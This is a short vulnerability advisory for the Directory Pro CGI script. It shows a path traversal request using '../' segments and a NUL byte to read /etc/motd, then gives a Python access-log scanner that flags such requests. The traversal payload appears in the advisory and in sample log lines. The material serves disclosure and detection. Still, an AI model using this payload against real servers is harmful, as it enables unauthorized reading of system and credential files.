Directory Pro Arbitrary File Disclosure Vulnerability

Submit a request such as this to a vulnerable webserver:

http://target/cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/motd%00

This will result in the contents of '/etc/motd' being output.
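The request above can be detected in web server access logs. The following is an added example, not part of the original advisory or of Directory Pro: it scans log lines for requests to directorypro.cgi whose decoded 'show' parameter contains a ".." path segment or a NUL byte. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format) for the demo; the second
# one carries the request shown in the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /cgi-bin/directorypro.cgi?want=showcat&show=Computers HTTP/1.0" 200 5120',
    '192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/motd%00 HTTP/1.0" 200 312',
    '192.0.2.77 - - [01/Jan/2010:10:01:00 +0000] "GET /index.html?show=../x HTTP/1.0" 404 100',
    '192.0.2.10 - - [01/Jan/2010:10:02:00 +0000] "GET /cgi-bin/directorypro.cgi?want=showcat&show=Arts/Music HTTP/1.0" 200 2048',
]

# Captures client address, request target and response status.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def check_show(value):
    """Return the reasons a decoded 'show' value is suspicious (empty if none)."""
    reasons = []
    if "\x00" in value:
        reasons.append("nul-byte")
    if ".." in re.split(r"[/\\]", value):
        reasons.append("dot-dot-segment")
    return reasons


def scan(lines):
    """Return (client, status, decoded show value, reasons) for flagged lines."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/directorypro.cgi"):
            continue  # only the script named in the advisory is of interest
        # parse_qs percent-decodes, so %00 becomes a real NUL byte here.
        for value in parse_qs(url.query, keep_blank_values=True).get("show", []):
            reasons = check_show(value)
            if reasons:
                findings.append((client, int(status), value, reasons))
    return findings


if __name__ == "__main__":
    for client, status, value, reasons in scan(SAMPLE_LOG):
        print(client, status, repr(value), ",".join(reasons))
```

A 200 status on a flagged line means the request was served, so the response should be reviewed as a possible file disclosure.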


 

Copyright 2010, SecurityFocus